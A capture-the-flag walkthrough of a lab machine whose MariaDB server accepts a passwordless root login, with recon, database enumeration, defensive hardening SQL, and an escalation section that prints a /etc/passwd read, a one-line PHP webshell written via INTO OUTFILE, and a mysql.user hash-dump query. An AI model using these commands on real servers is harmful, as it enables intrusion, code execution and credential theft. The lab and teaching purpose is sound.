⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Sequel targets a MariaDB instance — a fully open-source MySQL fork — exposed on the network with a root account that has no password. Unlike the web-layer SQL injection in Appointment, this machine teaches direct database access: connecting to the database server itself via its client, navigating schemas, and querying tables to extract data. It's a critical finding that skips the application layer entirely.

Tools: nmap · mysql client  ·  Difficulty: Very Easy  ·  OS: Linux
01 — What You Will Learn
| Skill | Why it matters |
| --- | --- |
| Identifying MySQL / MariaDB with Nmap | Port 3306 is a high-value target in any network assessment |
| Connecting without credentials | Passwordless root access to a database server is a maximum-severity finding |
| SQL navigation (SHOW, USE, SELECT) | The essential commands for manually enumerating any relational database |
| Database schema reconnaissance | Mapping tables before querying reveals where credentials and sensitive data live |
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MariaDB (unauthorized)
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|_  Salt: ...

What you're seeing: MariaDB on the standard MySQL port 3306. The banner exposes the exact version — MariaDB 10.3.27. The word "unauthorized" in Nmap's output simply means it connected to get the banner before authentication; the server is still accessible.

03 — Connecting to MariaDB

Use the mysql client. The -h flag specifies the remote host, -u root sets the username, and -p without a value prompts for a password — just hit Enter.

Connect as root
mysql -h 10.129.x.x -u root -p
Enter password: (press Enter)
MariaDB [(none)]>
✓ You're in. Root access to the database server with no password.
⚠  A passwordless root account on a network-accessible database is a CVSS 10.0 finding. It gives an attacker full read/write access to every database on the server, and in some configurations, file system access and OS command execution.
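
The defender's side of this finding, as an added example that is not part of the original walkthrough: SQL to locate accounts that accept an empty password and to remove the remote root login. It assumes the MariaDB mysql.user column layout; the app_rw account, the 10.0.0.5 host and the password placeholders are hypothetical.

```sql
-- Added example, not from the original walkthrough.
-- Assumes MariaDB's mysql.user columns (Password, plugin,
-- authentication_string, is_role, Super_priv).

-- 1. Accounts that can log in with an empty password.
--    unix_socket accounts are excluded: they authenticate by OS user,
--    not by password, so an empty hash is expected there.
SELECT User, Host, plugin
FROM mysql.user
WHERE is_role = 'N'
  AND COALESCE(Password, '') = ''
  AND COALESCE(authentication_string, '') = ''
  AND COALESCE(plugin, '') IN ('', 'mysql_native_password');

-- 2. Highly privileged accounts that are reachable from other hosts.
SELECT User, Host
FROM mysql.user
WHERE Super_priv = 'Y'
  AND Host NOT IN ('localhost', '127.0.0.1', '::1');

-- 3. Remove the remote root login and keep root local-only.
--    'root'@'%' is the account form used in this page's command reference;
--    adjust it to whatever query 2 returns.
DROP USER IF EXISTS 'root'@'%';
ALTER USER IF EXISTS 'root'@'localhost'
  IDENTIFIED BY '<long-random-password>';   -- placeholder

-- 4. Give the application its own least-privilege account, bound to the
--    application server's address. 'app_rw' and 10.0.0.5 are hypothetical.
CREATE USER 'app_rw'@'10.0.0.5' IDENTIFIED BY '<long-random-password>';
GRANT SELECT, INSERT, UPDATE, DELETE ON htb.* TO 'app_rw'@'10.0.0.5';

-- 5. Outside SQL: in my.cnf under [mysqld], bind-address = 127.0.0.1 keeps
--    port 3306 off the network when the application runs on the same host.
```

Re-run query 1 after the changes; an empty result means no account still accepts a blank password.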
04 — Database Enumeration
List all databases
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
Switch to the htb database
MariaDB [(none)]> USE htb;
MariaDB [htb]> SHOW TABLES;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
Query config table for the flag
MariaDB [htb]> SELECT * FROM config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915d   |
|  2 | admin_password        | 7dp_Yf34!0C...                   |
+----+-----------------------+----------------------------------+
✓ Submit the flag string to complete the machine.
ℹ  Notice the admin_password field sitting next to the flag. In a real assessment, every column in every table is in scope — credentials, API keys, PII, and session tokens are all potential findings.
05 — MySQL / MariaDB Command Reference
| Command | What it does |
| --- | --- |
| SHOW DATABASES; | List all databases on the server |
| USE <db>; | Switch to a specific database |
| SHOW TABLES; | List all tables in the current database |
| DESCRIBE <table>; | Show column names and types |
| SELECT * FROM <table>; | Return all rows from a table |
| SELECT * FROM <table> LIMIT 10; | Return first 10 rows only |
| SELECT user,password FROM mysql.user; | Dump database user hashes |
| SELECT @@version; | Get the database version |
| SELECT @@datadir; | Get the data directory path |
| SHOW GRANTS FOR 'root'@'%'; | Check privileges for a user |
06 — Escalation: FILE Privilege and INTO OUTFILE

If the MySQL user has the FILE privilege, you can read and write files on the underlying OS — a path to webshell upload or credential theft.

Check FILE privilege
SHOW GRANTS FOR CURRENT_USER();
Read a system file (if FILE privilege exists)
SELECT LOAD_FILE('/etc/passwd');
Write a webshell (if FILE privilege + web root is writable)
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
⚠  INTO OUTFILE only works if the MySQL user has FILE privilege, secure_file_priv is not set, and the target path is writable. When all three conditions are met, it's a direct path from database access to OS command execution.
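
The three conditions above, checked and closed from the administrator's side, as an added example that is not part of the original walkthrough. It assumes MariaDB semantics for secure_file_priv; the account name, host and directory are hypothetical placeholders.

```sql
-- Added example, not from the original walkthrough.

-- 1. Accounts holding the global FILE privilege.
SELECT GRANTEE
FROM information_schema.USER_PRIVILEGES
WHERE PRIVILEGE_TYPE = 'FILE';

-- 2. Where the server allows file import/export.
--    On MariaDB an unset (NULL) or empty value means no directory restriction.
--    MySQL 5.7 and later differ: NULL there disables import/export entirely.
SELECT @@global.secure_file_priv AS secure_file_priv,
       CASE
         WHEN COALESCE(@@global.secure_file_priv, '') = ''
           THEN 'MariaDB: unrestricted, any path the server process can reach'
         ELSE 'restricted to the listed directory'
       END AS file_io_scope;

-- 3. Revoke FILE from every account that does not need it.
--    Replace the hypothetical account with one returned by query 1.
REVOKE FILE ON *.* FROM 'app_rw'@'10.0.0.5';

-- 4. secure_file_priv cannot be changed at runtime. Set it in my.cnf under
--    [mysqld] and restart the server (the directory is a hypothetical choice,
--    kept outside any web root):
--      secure_file_priv = /var/lib/mysql-files

-- 5. Outside SQL: the OS account that runs the database server should have
--    no write permission on the web root, which removes the third condition.
```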
07 — Key Takeaways
Direct database access bypasses all application-layer controls. Once you're in the MySQL shell as root, you're reading the raw data every application on that server is built on top of.
| Concept | Real-world relevance |
| --- | --- |
| Port 3306 on the network perimeter | MySQL/MariaDB should never be accessible from outside the application server — always flag external exposure as critical |
| Root with no password | A common misconfiguration in development environments that gets deployed to production |
| mysql.user table | Always check this — it contains password hashes for all database users, which may be reused elsewhere |
| FILE privilege = partial RCE | Combined with a writable web root, SQL access becomes code execution |